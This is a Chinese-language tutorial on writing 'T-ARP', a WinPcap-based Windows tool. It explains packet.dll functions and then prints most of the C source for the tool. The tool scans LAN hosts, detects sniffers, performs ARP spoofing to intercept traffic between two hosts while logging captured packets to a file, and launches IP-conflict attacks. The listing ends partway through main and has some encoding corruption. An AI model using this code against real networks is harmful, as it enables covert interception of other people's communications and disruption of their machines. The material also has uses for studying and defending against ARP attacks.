详谈调用winpcap驱动写arp多功能工具
详谈调用winpcap驱动写arp多功能工具
一 winpcap驱动简介
二 Packet.dll相关数据结构及函数
三 T-ARP功能及原理介绍
四 T-ARP主要代码分析
五 T-ARP源代码
一、winpcap驱动简介
winpcap(windows packet capture)是windows平台下一个免费,公共的网络访问系统。
(编者注:WinpCap开发包可以到以下两个网址下载: (1)http://winpcap.polito.it/ , (2)VC知识库工具栏目 )
开发winpcap这个项目的目的在于为win32应用程序提供访问网络底层的能力。它提供了以下的各项功能:
1> 捕获原始数据报,包括在共享网络上各主机发送/接收的以及相互之间交换的数据报;
2> 在数据报发往应用程序之前,按照自定义的规则将某些特殊的数据报过滤掉;
3> 在网络上发送原始的数据报;
4> 收集网络通信过程中的统计信息。
winpcap的主要功能在于独立于主机协议(如TCP-IP)而发送和接收原始数据报。也就是说,winpcap不能阻塞,过滤或控制其他应用程序数据报的发收,它仅仅只是监听共享网络上传送的数据报。因此,它不能用于QoS调度程序或个人防火墙。
目前,winpcap开发的主要对象是windows NT/2000/XP,这主要是因为在使用winpcap的用户中只有一小部分是仅使用windows 95/98/Me,并且M$也已经放弃了对win9x的开发。因此本文相关的程序T-ARP也是面向NT/2000/XP用户的。其实winpcap中的面向9x系统的概念和NT系统的非常相似,只是在某些实现上有点差异,比如说9x只支持ANSI编码,而NT系统则提倡使用Unicode编码。
本文讨论的是packet.dll所提供的各种函数,因为它们完全可以实现本文所希望的各项要求。但是如果你有其他特别的或更高级的要求,winpcap也提供了另一个动态连接库wpcap.dll。虽然wpcap.dll依靠于packet.dll,但是它却提供了一种更简单,直接,有力的方法来更好的利用编程环境。比如捕获一个数据报,创建一个数据报过滤装置或将监听到的数据报转存到某个文件等,wpcap.dll都会为你提供更加安全的实现方法。
二、Packet.dll相关数据结构及函数
本文的目的之一在于介绍如何利用winpcap驱动写ARP工具,因此有必要介绍一些相关的数据结构和函数,要不然看着一行行代码和函数,也许会有些不知所云。
首先介绍一些相关的数据结构:
1. typedef struct _ADAPTER ADAPTER //描述一个网络适配器;
2. typedef struct _PACKET PACKET //描述一组网络数据报的结构;
3. typedef struct NetType NetType //描述网络类型的数据结构;
4. typedef struct npf_if_addr npf_if_addr //描述一个网络适配器的ip地址;
5. struct bpf_hdr //数据报头部;
6. struct bpf_stat //当前捕获数据报的统计信息。
下面,将介绍T-ARP用到的各个函数,他们都是在packet.dll中定义的:
1> LPPACKET PacketAllocatePacket(void)
如果运行成功,返回一个_PACKET结构的指针,否则返回NULL。成功返回的结果将会传送到PacketReceivePacket()函数,接收来自驱动的网络数据报。
2> VOID PacketCloseAdapter(LPADAPTER lpAdapter)
关闭参数中提供的网络适配器,释放相关的ADAPTER结构。
3> VOID PacketFreePacket(LPPACKET lpPacket)
释放参数提供的_PACKET结构。
4> BOOLEAN PacketGetAdapterNames(LPSTR pStr,PULONG BufferSize)
返回可以得到的网络适配器列表及描述。
5> BOOLEAN PacketGetNetInfoEx(LPTSTR AdapterNames,npf_ip_addr *buff, PLONG NEntries)
返回某个网络适配器的全面地址信息。
其中npf_ip_addr结构包含:IPAddress,SubnetMask,Broadcast
IPAddress: ip地址
SubnetMask: 子网掩码
Broadcast: 广播地址
6> BOOLEAN PacketGetNetType(LPADAPTER AdapterObject, NetType *type)
返回某个网络适配器的MAC类型。
NetType结构里包含了LinkSpeed(速度)和LinkType(类型)。其中LinkType包含以下几种情况:
NdisMedium802_3: Ethernet(802.3)
NdisMediumWan: WAN
NdisMedium802_5: Token Ring(802.5)
NdisMediumFddi: FDDI
NdisMediumAtm: ATM
NdisMediumArcnet878_2: ARCNET(878.2)
7> BOOLEAN PacketGetStats(LPADAPTER AdapterObject,struct bpf_stat *s)
返回几个关于当前捕获报告的统计信息。
其中bpf_stat结构包含:bs_recv, bs_drop,ps_ifdrop,bs_capt
bs_recv: 从网络适配器开始捕获数据报开始所接收到的所有数据报的数目,包括丢失的数据报;
bs_drop: 丢失的数据报数目。在驱动缓冲区已经满时,就会发生数据报丢失的情况。
8> PCHAR PacketGetVersion()
返回关于dll的版本信息。
9> VOID PacketInitPacket(LPPACKET lpPacket, PVOID Buffer, UINT Length)
初始化一个_PACKET结构。
10> LPADAPTER PacketOpetAdapter(LPTSTR AdapterName)
打开一个网络适配器。
11> BOOLEAN PacketReceivePacket(LPADAPTER AdapterObject,LPPACKET lpPacket,BOOLEAN Sync)
从NPF驱动程序读取网络数据报及统计信息。
数据报编码结构: |bpf_hdr|data|Padding|bpf_hdr|data|Padding|
12> BOOLEAN PacketSendPacket(LPADAPTER AdapterObject,LPPACKET lpPacket, BOOLEAN Sync)
发送一个或多个数据报的副本。
13> BOOLEAN PacketSetBuff(LPADAPTER AdapterObject,int dim)
设置捕获数据报的内核级缓冲区大小。
14> BOOLEAN PacketSetHwFilter(LPADAPTER AdapterObject,ULONG Filter)
为接收到的数据报设置硬件过滤规则。
以下为一些典型的过滤规则:
NDIS_PACKET_TYPE_PROMISCUOUS: 设置为混杂模式,接收所有流过的数据报;
NDIS_PACKET_TYPE_DIRECTED: 只有目的地为本地主机网络适配器的数据报才会被接收;
NDIS_PACKET_TYPE_BROADCAST: 只有广播数据报才会被接收;
NDIS_PACKET_TYPE_MULTICAST: 只有与本地主机网络适配器相对应的多播数据报才会被接收;
NDIS_PACKET_TYPE_ALL_MULTICAST: 所有多播数据报均被接收;
NDIS_PACKET_TYPE_ALL_LOCAL: 所有本地数据报均被接收。
15> BOOLEAN PacketSetNumWrites(LPADAPTER AdapterObject,int nwrites)
设置调用PacketSendPacket()函数发送一个数据报副本所重复的次数。
16> BOOLEAN PacketSetReadTimeout(LPADAPTER AdapterObject,int timeout)
设置在接收到一个数据报后“休息”的时间。
以上就是T-ARP所调用的各个函数,它包含了packet.dll里的大部分函数。如果你想更深层的了解winpcap,请访问相关网站,主页地址: http://winpcap.polito.it
三、T-ARP功能及原理介绍
准备工作:
1. 安装winpcap驱动,目前最新的版本为winpcap_3.0_alpha, 稳定版本为winpcap_2.3;
2. 使用ARP欺骗功能前,必须启动ip路由功能,修改(添加)注册表选项:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
选项:
-m 主机扫描,获得局域网内指定ip段中存活主机的ip地址和mac地址;
-a 反嗅探扫描,获得局域网内指定ip段中嗅探主机的ip地址和mac地址;
-s ARP欺骗,欺骗局域网内指定的两台主机,使其相互发送接收的数据报均通过本地主机;
网络嗅探,如果你选择欺骗的两台主机均是本地主机,那么将会监听到所有流过本地主机的数据报;
IP冲突,如果你选择欺骗的两台主机是同一台非本地主机,那么就会发起ip冲突攻击;
-r 重置被欺骗主机,使被欺骗的两台主机恢复正常的工作状态。
原理及实现过程:
无论什么选项,第一件事就是获得本地主机的mac地址及相关网络设置。我们以一个特殊的ip地址(112.112.112.112)向本地主机发送一个ARP Request(ARP请求)数据报,当本地主机接收到后,就会发送一个ARP Reply(ARP应答)数据报来回应请求,这样我们就可以获得本地主机的mac地址了。至于相关的网络设置可以通过PacketGetNetInfoEx()和PacketGetNetType()获得。
-m 以本地主机的名义(本地主机的ip和mac)向指定ip网段内的所有主机发送广播(ff:ff:ff:ff:ff:ff)ARP Request数据报,存活的主机就会发送ARP Reply数据报,这样就可以获得当前存活主机的列表。因为在很多网关上都对ARP Request做了限制--非内网ip发送的ARP Request数据报不会得到网关的回应,如果你用内网的其他某台主机的ip来发送ARP Request数据报,如果填写的mac地址和相应的ip不合,就会出现ip冲突。所以最好还是用自己的ip和mac地址来发送请求。
-a 以本地主机的名义(本地主机的ip和mac)向指定ip网段内的所有主机发送31位伪广播地址(ff:ff:ff:ff:ff:fe)的ARP Request数据报,只有正在嗅探的主机才会发送ARP Reply数据报,这样就可以获得当前存活主机的列表。嗅探中的win2000系统还会对16位伪广播地址(ff:ff:00:00:00:00)做出回应;而嗅探中的win95/98/me不仅会回应16位伪广播地址,而且也会回应8位伪广播地址(ff:00:00:00:00:00),而*NIX系统对各种广播地址所做出的反应却有些不同。在此我们选择31位伪广播地址,是因为绝大多数的系统在嗅探时都会对它做出回应。而正常状况下的各种系统,都不会对31位伪广播地址做出回应。
-s (ARP欺骗spoof) 需要强调的是在某些局域网(如以太网)内,数据报的发送与接收是基于硬件地址的,这是我们实现欺骗的基础。首先获得指定的两台主机(假设为 A 和 B)的mac地址,然后向A发送ARP Reply数据报,其中的源ip地址为B的ip地址,但是源mac地址却是本地主机的mac地址,这样主机A就会认为主机B的mac地址是本地主机的mac地址,所以主机A发送到主机B的数据报都发送到本地主机了。同理向主机B发送ARP Reply数据报,通知它主机A的mac地址为本地主机的mac地址。这样主机A和主机B就会把目的主机的mac地址理解为本地主机的mac地址,于是他们之间相互发送的数据报都首先到达了本地主机,而先前我们已经将本地主机设置了ip路由功能,系统会自动将数据报转发到真正的目的主机。其间,你就可以监听它们通信的各种数据报了。
-s (网络嗅探sniff) 如果指定的两个目的主机均为本地主机,那么就只是将网络适配器设置为混杂模式,这样就可以监听到流过本地主机网络适配器的各种数据。
-s (ip冲突shock) 如果你选择欺骗的两台主机是同一台非本地主机(假如是主机C),那么就会不断地向主机C发送ARP Reply数据报,报文中的源ip地址就是主机C的ip地址,但是源mac地址却是本地主机的mac地址,因此主机C就会发现有另一台主机同时拥有和自己相同的ip,这就是ip冲突攻击。如果是非xp系统,都会跳出一个ip冲突的提示窗口,而xp系统也会有类似的警告。但是请注意,在主机C的系统事件查看器中,会留下本地主机的mac地址与之冲突的恶心记录,所以你最好不要滥用这个功能。
-r 在实现了ARP欺骗的情况下,向主机A和B发送ARP Reply数据报,通知主机A(B)注意主机B(A)的mac地址为主机B(A)自己的mac地址,这样主机A和B就会更新他们的ARP缓存,实现正常的数据通信。
四、T-ARP主要代码分析
1> 自定义函数:
int getmine() //发送ARP Request数据报,请求获得本地主机的mac地址;
void getdata(LPPACKET lp,int op) //分类处理接收到的数据报;
DWORD WINAPI sniff(LPVOID no) //将网络适配器设置为混杂模式,接收所有流过的数据报;
DWORD WINAPI sendMASR(LPVOID no) //发送ARP Request数据报,请求获得指定ip的mac地址;
DWORD WINAPI sendSR(LPVOID no) //发送ARP Reply进行ARP欺骗,或是更新主机的ARP缓存。
2> 主要代码分析
printf("\nLibarary Version: %s",PacketGetVersion()); //输出dll的版本信息;
PacketGetAdapterNames((char *)adaptername,&adapterlength) //获得本地主机的网络适配器列表和描述;
lpadapter=PacketOpenAdapter(adapterlist[open-1]); //打开指定的网络适配器;
PacketGetNetType(lpadapter,&ntype) //获得网络适配器的MAC类型;
PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen) //获得指定网络适配器的相关信息;
rthread=CreateThread(NULL,0,sniff,(LPVOID)&opti,0,&threadrid); //创建一个新线程来监听网络数据报;
PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS) //将网络适配器设置为混杂模式,这样才可以监听流过本地主机的数据报;
PacketSetBuff(lpadapter,500*1024) //自定义网络适配器的内核缓存的大小为 500*1024;
PacketSetReadTimeout(lpadapter,1) //设置接收一个数据报后等待的时间为1毫秒;
PacketReceivePacket(lpadapter,lppacketr,TRUE) //在设置为混杂模式后,接收所有的数据报;
sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsid);
sthread=CreateThread(NULL,0,sendSR,(LPVOID)&opti,0,&threadsid); //创建一个新线程发送特定的ARP数据报
PacketSetNumWrites(lpadapter,2) //在发送一个数据报时,重复发送两次;
PacketSendPacket(lpadapter,lppackets,TRUE) //发送自定义数据报;
WaitForSingleObject(sthread,INFINITE); //等待发送ARP数据报的线程结束;
PacketGetStats(lpadapter,&stat) //获得网络适配器的统计信息;
代码
#include " ntddndis.h "
#include < stdio.h >
#include < conio.h >
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")
#define ETH_IP 0x0800
#define ETH_ARP 0x0806
#define ARP_REQUEST 0x0001
#define ARP_REPLY 0x0002
#define ARP_HARDWARE 0x0001
#define max_num_adapter 10
#pragma pack(push,1)
typedef struct ethdr
{
unsigned char eh_dst[ 6 ];
unsigned char eh_src[ 6 ];
unsigned short eh_type;
}ETHDR, * PETHDR;
typedef struct arphdr
{
unsigned short arp_hdr;
unsigned short arp_pro;
unsigned char arp_hln;
unsigned char arp_pln;
unsigned short arp_opt;
unsigned char arp_sha[ 6 ];
unsigned long arp_spa;
unsigned char arp_tha[ 6 ];
unsigned long arp_tpa;
}ARPHDR, * PARPHDR;
typedef struct iphdr
{
unsigned char h_lenver;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceip;
unsigned int destip;
}IPHDR, * PIPHDR;
#pragma pack(push)
LPADAPTER lpadapter = 0 ;
LPPACKET lppacketr,lppackets;
ULONG myip,firstip,secondip;
UCHAR mmac[ 6 ] = { 0 },fmac[ 6 ] = { 0 },smac[ 6 ] = { 0 };
BOOL mm = FALSE,fm = FALSE,sm = FALSE;
FILE * fp;
char adapterlist[max_num_adapter][ 1024 ];
char msg[ 50 ];
int num = 0 ;
void start()
{
printf( " T-ARP --- ARP Tools, by TOo2y(??), 11-9-2002\n " );
printf( " Homepage: www.safechina.net\n " );
printf( " E-mail: [email protected]\n " );
return ;
}
void usage()
{
printf( " \nUsage: T-ARP [-m|-a|-s|-r] firstip secondip \n\n " );
printf( " Option:\n " );
printf( " -m mac Get the mac address from firstip to secondip\n " );
printf( " -a antisniff Get the sniffing host from firstip to secondip\n " );
printf( " -s spoof 1> Spoof the host between firstip and secondip\n " );
printf( " sniff 2> Sniff if firstip == secondip == your own ip\n " );
printf( " shock 3> Shock if firstip == secondip != your own ip\n " );
printf( " -r reset Reset the spoofed host work normally\n\n " );
printf( " Attention:\n " );
printf( " 1> You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n " );
printf( " 2> HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\IPEnableRouter == 0x1\n\n " );
return ;
}
int getmine()
{
char sendbuf[ 1024 ];
int k;
ETHDR eth;
ARPHDR arp;
for (k = 0 ;k < 6 ;k ++ )
{
eth.eh_dst[k] = 0xff ;
eth.eh_src[k] = 0x82 ;
arp.arp_sha[k] = 0x82 ;
arp.arp_tha[k] = 0x00 ;
}
eth.eh_type = htons(ETH_ARP);
arp.arp_hdr = htons(ARP_HARDWARE);
arp.arp_pro = htons(ETH_IP);
arp.arp_hln = 6 ;
arp.arp_pln = 4 ;
arp.arp_opt = htons(ARP_REQUEST);
arp.arp_tpa = htonl(myip);
arp.arp_spa = inet_addr( " 112.112.112.112 " );
memset(sendbuf, 0 , sizeof (sendbuf));
memcpy(sendbuf,ð, sizeof (eth));
memcpy(sendbuf + sizeof (eth), & arp, sizeof (arp));
PacketInitPacket(lppackets,sendbuf, sizeof (eth) + sizeof (arp));
if (PacketSendPacket(lpadapter,lppackets,TRUE) == FALSE)
{
printf( " PacketSendPacket in getmine Error: %d\n " ,GetLastError());
return - 1 ;
}
return 0 ;
}
void getdata(LPPACKET lp, int op)
{
ULONG ulbytesreceived,off,tlen,ulen,ulLines;
ULONG j,k;
ETHDR * eth;
ARPHDR * arp;
PIPHDR ip;
char * buf, * pChar, * pLine, * base ;
struct bpf_hdr * hdr;
struct sockaddr_in sin;
ulbytesreceived = lp -> ulBytesReceived;
buf = ( char * )lp -> Buffer;
off = 0 ;
while (off < ulbytesreceived)
{
if (kbhit())
{
return ;
}
hdr = ( struct bpf_hdr * )(buf + off);
off += hdr -> bh_hdrlen;
pChar = ( char * )(buf + off);
base = pChar;
off = Packet_WORDALIGN(off + hdr -> bh_caplen);
eth = (PETHDR)pChar;
arp = (PARPHDR)(pChar + sizeof (ETHDR));
if (eth -> eh_type == htons(ETH_IP))
{
ip = (PIPHDR)(pChar + sizeof (ETHDR));
if (fm && sm && (op == 3 ))
{
if ((((ip -> sourceip != htonl(myip)) && (ip -> destip != htonl(myip))
&& ! strcmp(( char * )eth -> eh_dst,( char * )mmac))
&& ((ip -> sourceip == htonl(firstip)) || (ip -> destip == htonl(firstip))
|| (ip -> sourceip == htonl(secondip)) || (ip -> destip == htonl(secondip))))
|| ((firstip == myip) && (secondip == myip)))
{
memset(msg, 0 , sizeof (msg));
sin.sin_addr.s_addr = ip -> sourceip;
printf( " [IP:]%16s ---> [IP:] " ,inet_ntoa(sin.sin_addr));
strcpy(msg,inet_ntoa(sin.sin_addr));
strcat(msg + 15 , " ---> " );
sin.sin_addr.s_addr = ip -> destip;
printf( " %16s\n " ,inet_ntoa(sin.sin_addr));
strcat(msg + 23 ,inet_ntoa(sin.sin_addr));
fseek(fp, - 2 , 1 );
fwrite( " \r\n\r\n\r\n " , 6 , 1 ,fp);
fwrite(msg, 38 , 1 ,fp);
fwrite( " \r\n " , 2 , 1 ,fp);
ulLines = (hdr -> bh_caplen + 15 ) / 16 ;
for (k = 0 ;k < ulLines;k ++ )
{
pLine = pChar;
printf( " %08lx : " ,pChar - base );
ulen = tlen;
ulen = (ulen > 16 ) ? 16 : ulen;
tlen -= ulen;
for (j = 0 ;j < ulen;j ++ )
printf( " %02x " , * (BYTE * )pChar ++ );
if (ulen < 16 )
printf( " %*s " ,( 16 - ulen) * 3 , " " );
pChar = pLine;
for (j = 0 ;j < ulen;j ++ ,pChar ++ )
{
printf( " %c " ,isprint( * pChar) ? * pChar : '' . '' );
fputc(isprint( * pChar) ? * pChar : '' . '' ,fp);
}
printf( " \n " );
}
printf( " \n " );
fwrite( " \r\n " , 2 , 1 ,fp);
}
}
continue ;
}
else if ((eth -> eh_type == htons(ETH_ARP)) && (arp -> arp_opt == htons(ARP_REPLY)))
{
sin.sin_addr.s_addr = arp -> arp_spa;
if (sin.sin_addr.s_addr == htonl(myip))
{
memcpy(mmac,eth -> eh_src, 6 );
if ( ! mm)
{
printf( " \t " );
for (k = 0 ;k < 5 ;k ++ )
printf( " %.2x- " ,eth -> eh_src[k]);
printf( " %.2x\n " ,eth -> eh_src[ 5 ]);
switch (op)
{
case 1 :
printf( " \n[MAC LIST:] " );
break ;
case 2 :
printf( " \n[Sniffing Host:] " );
break ;
default :
break ;
}
}
mm = TRUE;
}
if ((op == 1 ) || (op == 2 ))
{
printf( " \n[IP:] %.16s\t[MAC:] " ,inet_ntoa(sin.sin_addr));
for (k = 0 ;k < 5 ;k ++ )
printf( " %.2x- " ,eth -> eh_src[k]);
printf( " %.2x " ,eth -> eh_src[ 5 ]);
}
else if (((op == 3 ) || (op == 4 )) && ( ! fm || ! sm))
{
if (arp -> arp_spa == htonl(firstip))
{
memcpy(fmac,eth -> eh_src, 6 );
fm = TRUE;
}
if (arp -> arp_spa == htonl(secondip))
{
memcpy(smac,eth -> eh_src, 6 );
sm = TRUE;
}
}
}
}
return ;
}
DWORD WINAPI sniff(LPVOID no)
{
int option =* ( int * )no;
char recvbuf[ 1024 * 250 ];
if (PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE)
{
printf( " Warning: Unable to set the adapter to promiscuous mode\n " );
}
if (PacketSetBuff(lpadapter, 500 * 1024 ) == FALSE)
{
printf( " PacketSetBuff Error: %d\n " ,GetLastError());
return - 1 ;
}
if (PacketSetReadTimeout(lpadapter, 1 ) == FALSE)
{
printf( " Warning: Unable to set the timeout\n " );
}
if ((lppacketr = PacketAllocatePacket()) == FALSE)
{
printf( " PacketAllocatePacket receive Error: %d\n " ,GetLastError());
return - 1 ;
}
PacketInitPacket(lppacketr,( char * )recvbuf, sizeof (recvbuf));
while ( ! kbhit())
{
if (PacketReceivePacket(lpadapter,lppacketr,TRUE) == FALSE)
{
return - 1 ;
}
getdata(lppacketr,option);
}
return 0 ;
}
DWORD WINAPI sendMASR(LPVOID no)
{
int fun =* ( int * )no;
int k,stimes;
char sendbuf[ 1024 ];
ETHDR eth;
ARPHDR arp;
if (fun < 1 || fun > 4 )
{
return - 1 ;
}
else
{
for (k = 0 ;k < 6 ;k ++ )
{
eth.eh_dst[k] = 0xff ;
arp.arp_tha[k] = 0x00 ;
}
if (fun == 2 )
eth.eh_dst[ 5 ] = 0xfe ;
}
memcpy(eth.eh_src,mmac, 6 );
eth.eh_type = htons(ETH_ARP);
arp.arp_hdr = htons(ARP_HARDWARE);
arp.arp_pro = htons(ETH_IP);
arp.arp_hln = 6 ;
arp.arp_pln = 4 ;
arp.arp_opt = htons(ARP_REQUEST);
arp.arp_spa = htonl(myip);
memcpy(arp.arp_sha,mmac, 6 );
if (fun == 1 || fun == 2 )
stimes = 1 ;
else if (fun == 3 || fun == 4 )
stimes = 2 ;
for (k = 0 ;k < stimes;k ++ )
{
if (stimes == 1 )
{
arp.arp_tpa = htonl(firstip + (num ++ ));
}
else if (stimes == 2 )
{
switch (k)
{
case 0 :
arp.arp_tpa = htonl(firstip);
break ;
case 1 :
arp.arp_tpa = htonl(secondip);
break ;
default :
break ;
}
}
memset(sendbuf, 0 , sizeof (sendbuf));
memcpy(sendbuf,ð, sizeof (eth));
memcpy(sendbuf + sizeof (eth), & arp, sizeof (arp));
PacketInitPacket(lppackets,sendbuf, sizeof (eth) + sizeof (arp));
if (PacketSendPacket(lpadapter,lppackets,TRUE) == FALSE)
{
printf( " PacketSendPacket in sendMASR Error: %d\n " ,GetLastError());
return - 1 ;
}
}
return 0 ;
}
DWORD WINAPI sendSR(LPVOID no)
{
int fun =* ( int * )no;
int j,k;
char sendbuf[ 1024 ];
struct sockaddr_in fsin,ssin;
BOOL stimes = FALSE;
ETHDR eth;
ARPHDR arp;
fsin.sin_addr.s_addr = htonl(firstip);
ssin.sin_addr.s_addr = htonl(secondip);
eth.eh_type = htons(ETH_ARP);
arp.arp_hdr = htons(ARP_HARDWARE);
arp.arp_pro = htons(ETH_IP);
arp.arp_hln = 6 ;
arp.arp_pln = 4 ;
arp.arp_opt = htons(ARP_REPLY);
if (fun == 3 )
{
if (mm)
{
if ((firstip == myip) && (secondip == myip))
{
fm = TRUE;
sm = TRUE;
memcpy(fmac,mmac, 6 );
memcpy(smac,mmac, 6 );
}
else if ( ! fm || ! sm)
{
printf( " \nNot get enough data\n " );
return - 1 ;
}
for (j = 0 ;j < 2 ;j ++ )
{
if (j == 0 )
{
printf( " \nSpoofing %.16s : " ,inet_ntoa(fsin.sin_addr));
printf( " %.16s ==> " ,inet_ntoa(ssin.sin_addr));
}
else if (j == 1 )
{
printf( " Spoofing %.16s : " ,inet_ntoa(ssin.sin_addr));
printf( " %.16s ==> " ,inet_ntoa(fsin.sin_addr));
}
for (k = 0 ;k < 5 ;k ++ )
printf( " %.2x- " ,mmac[k]);
printf( " %.2x\n " ,mmac[ 5 ]);
}
printf( " \ni will try to snoof ...\n\n " );
stimes = TRUE;
}
else
{
printf( " \nNot get enough data\n " );
return - 1 ;
}
}
else if (fun == 4 )
{
if (mm)
{
if ((firstip == myip) && (secondip == myip))
{
fm = TRUE;
sm = TRUE;
memcpy(fmac,mmac, 6 );
memcpy(smac,mmac, 6 );
}
else if ( ! fm || ! sm)
{
printf( " \nNot get enough data\n " );
return - 1 ;
}
printf( " \nReset %.16s : " ,inet_ntoa(fsin.sin_addr));
printf( " %.16s ==> " ,inet_ntoa(ssin.sin_addr));
for (k = 0 ;k < 5 ;k ++ )
printf( " %.2x- " ,smac[k]);
printf( " %.2x\n " ,smac[ 5 ]);
printf( " Reset %.16s : " ,inet_ntoa(ssin.sin_addr));
printf( " %.16s ==> " ,inet_ntoa(fsin.sin_addr));
for (k = 0 ;k < 5 ;k ++ )
printf( " %.2x- " ,fmac[k]);
printf( " %.2x\n\n " ,fmac[ 5 ]);
stimes = FALSE;
}
else
{
printf( " \nNot get enough data\n " );
return - 1 ;
}
}
else
return - 1 ;
do
{
memcpy(eth.eh_dst,fmac, 6 );
memcpy(arp.arp_tha,fmac, 6 );
arp.arp_tpa = htonl(firstip);
arp.arp_spa = htonl(secondip);
if ( ! stimes)
{
memcpy(eth.eh_src,smac, 6 );
memcpy(arp.arp_sha,smac, 6 );
}
else
{
memcpy(eth.eh_src,mmac, 6 );
memcpy(arp.arp_sha,mmac, 6 );
}
memset(sendbuf, 0 , sizeof (sendbuf));
memcpy(sendbuf,ð, sizeof (eth));
memcpy(sendbuf + sizeof (eth), & arp, sizeof (arp));
PacketInitPacket(lppackets,sendbuf, sizeof (eth) + sizeof (arp));
if (PacketSetNumWrites(lpadapter, 2 ) == FALSE)
{
printf( " Warning: Unable to send a packet 2 times\n " );
}
if (PacketSendPacket(lpadapter,lppackets,TRUE) == FALSE)
{
printf( " PacketSendPacket in SendSR Error: %d\n " ,GetLastError());
return - 1 ;
}
Sleep( 1000 );
memcpy(eth.eh_dst,smac, 6 );
memcpy(arp.arp_tha,smac, 6 );
arp.arp_tpa = htonl(secondip);
arp.arp_spa = htonl(firstip);
if ( ! stimes)
{
memcpy(eth.eh_src,fmac, 6 );
memcpy(arp.arp_sha,fmac, 6 );
}
else
{
memcpy(eth.eh_src,mmac, 6 );
memcpy(arp.arp_sha,mmac, 6 );
}
memset(sendbuf, 0 , sizeof (sendbuf));
memcpy(sendbuf,ð, sizeof (eth));
memcpy(sendbuf + sizeof (eth), & arp, sizeof (arp));
PacketInitPacket(lppackets,sendbuf, sizeof (eth) + sizeof (arp));
if (PacketSendPacket(lpadapter,lppackets,TRUE) == FALSE)
{
printf( " PacketSendPacket int sendSR Error: %d\n " ,GetLastError());
return - 1 ;
}
Sleep( 1000 );
} while (stimes);
if (fun == 4 )
printf( " Reset Successfully " );
return 0 ;
}
int main( int argc, char * argv[])
{
HANDLE sthread,rthread;
WCHAR adaptername[ 8192 ];
WCHAR * name1, * name2;
ULONG adapterlength;
DWORD threadsid,threadrid;
struct NetType ntype;
struct bpf_stat stat;
struct sockaddr_in sin;
struct npf_if_addr ipbuff;
int adapternum = 0 ,opti = 0 ,open,i,total;
long npflen;
system( " cls.exe " );
start();
if (argc != 4 )
{
usage();
getche();
return - 1 ;
}
else
{
if ( ! strcmp(argv[ 1 ], " -m " ))
{
opti = 1 ;
}
else if ( ! strcmp(argv[ 1 ], " -a " ))
{
opti = 2 ;
}
else if ( ! strcmp(argv[ 1 ], " -s " ))
{
opti = 3 ;
if ((fp = fopen( " capture.txt " , " w+ " )) == NULL)
{
printf( " Open capture.txt Error: %d\n " );
return - 1 ;
}
else
{
fwrite( " T-ARP Captrue Data " , 20 , 1 ,fp);
}
}
else if ( ! strcmp(argv[ 1 ], " -r " ))
{
opti = 4 ;
}
else
{
usage();
getche();
return - 1 ;
}
}
firstip = ntohl(inet_addr(argv[ 2 ]));
secondip = ntohl(inet_addr(argv[ 3 ]));
total = secondip - firstip + 1 ;
printf( " \nLibarary Version: %s " ,PacketGetVersion());
adapterlength = sizeof (adaptername);
if (PacketGetAdapterNames(( char * )adaptername, & adapterlength) == FALSE)
{
printf( " PacketGetAdapterNames Error: %d\n " ,GetLastError());
return - 1 ;
}
name1 = adaptername;
name2 = adaptername;
i = 0 ;
while (( * name1 != '' \ 0 '' ) || ( * (name1 - 1 ) != '' \ 0 '' ))
{
if ( * name1 == '' \ 0 '' )
{
memcpy(adapterlist[i],name2, 2 * (name1 - name2));
name2 = name1 + 1 ;
i ++ ;
}
name1 ++ ;
}
adapternum = i;
printf( " \nAdapters Installed:\n " );
for (i = 0 ;i < adapternum;i ++ )
wprintf(L " %d - %s\n " ,i + 1 ,adapterlist[i]);
do
{
printf( " \nSelect the number of the adapter to open: " );
scanf( " %d " , & open);
if (open >= 1 && open <= adapternum)
break ;
} while (open < 1 || open > adapternum);
lpadapter = PacketOpenAdapter(adapterlist[open - 1 ]);
if ( ! lpadapter || (lpadapter -> hFile == INVALID_HANDLE_VALUE))
{
printf( " PacketOpenAdapter Error: %d\n " ,GetLastError());
return - 1 ;
}
if (PacketGetNetType(lpadapter, & ntype))
{
printf( " \n\t\t*** Host Information ***\n " );
printf( " [LinkTpye:]\t%d\t\t " ,ntype.LinkType);
printf( " [LinkSpeed:]\t%d b/s\n " ,ntype.LinkSpeed);
}
npflen = sizeof (ipbuff);
if (PacketGetNetInfoEx(adapterlist[open - 1 ], & ipbuff, & npflen))
{
sin =* ( struct sockaddr_in * ) & (ipbuff.Broadcast);
printf( " [Broadcast:]\t%.16s\t " ,inet_ntoa(sin.sin_addr));
sin =* ( struct sockaddr_in * ) & (ipbuff.SubnetMask);
printf( " [SubnetMask:]\t%.16s\n " ,inet_ntoa(sin.sin_addr));
sin =* ( struct sockaddr_in * ) & (ipbuff.IPAddress);
printf( " [IPAddress:]\t%.16s\t " ,inet_ntoa(sin.sin_addr));
myip = ntohl(sin.sin_addr.s_addr);
printf( " [MACAddress:] " );
}
else
{
printf( " \nNot get enough data\n " );
PacketFreePacket(lppackets);
PacketCloseAdapter(lpadapter);
return - 1 ;
}
if ((lppackets = PacketAllocatePacket()) == FALSE)
{
printf( " PacketAllocatePacket send Error: %d\n " ,GetLastError());
return - 1 ;
}
rthread = CreateThread(NULL, 0 ,sniff,(LPVOID) & opti, 0 , & threadrid);
Sleep( 300 );
if (getmine())
{
PacketFreePacket(lppackets);
PacketFreePacket(lppacketr);
PacketCloseAdapter(lpadapter);
return - 1 ;
}
Sleep( 300 );
if ((opti == 1 ) || (opti == 2 ))
{
for (i = 0 ;i < total;i ++ )
{
sthread = CreateThread(NULL, 0 ,sendMASR,(LPVOID) & opti, 0 , & threadsid);
Sleep( 30 );
}
Sleep( 1000 );
}
else if ((opti == 3 ) || (opti == 4 ))
{
sthread = CreateThread(NULL, 0 ,sendMASR,(LPVOID) & opti, 0 , & threadsid);
Sleep( 300 );
CloseHandle(sthread);
sthread = CreateThread(NULL, 0 ,sendSR,(LPVOID) & opti, 0 , & threadsid);
}
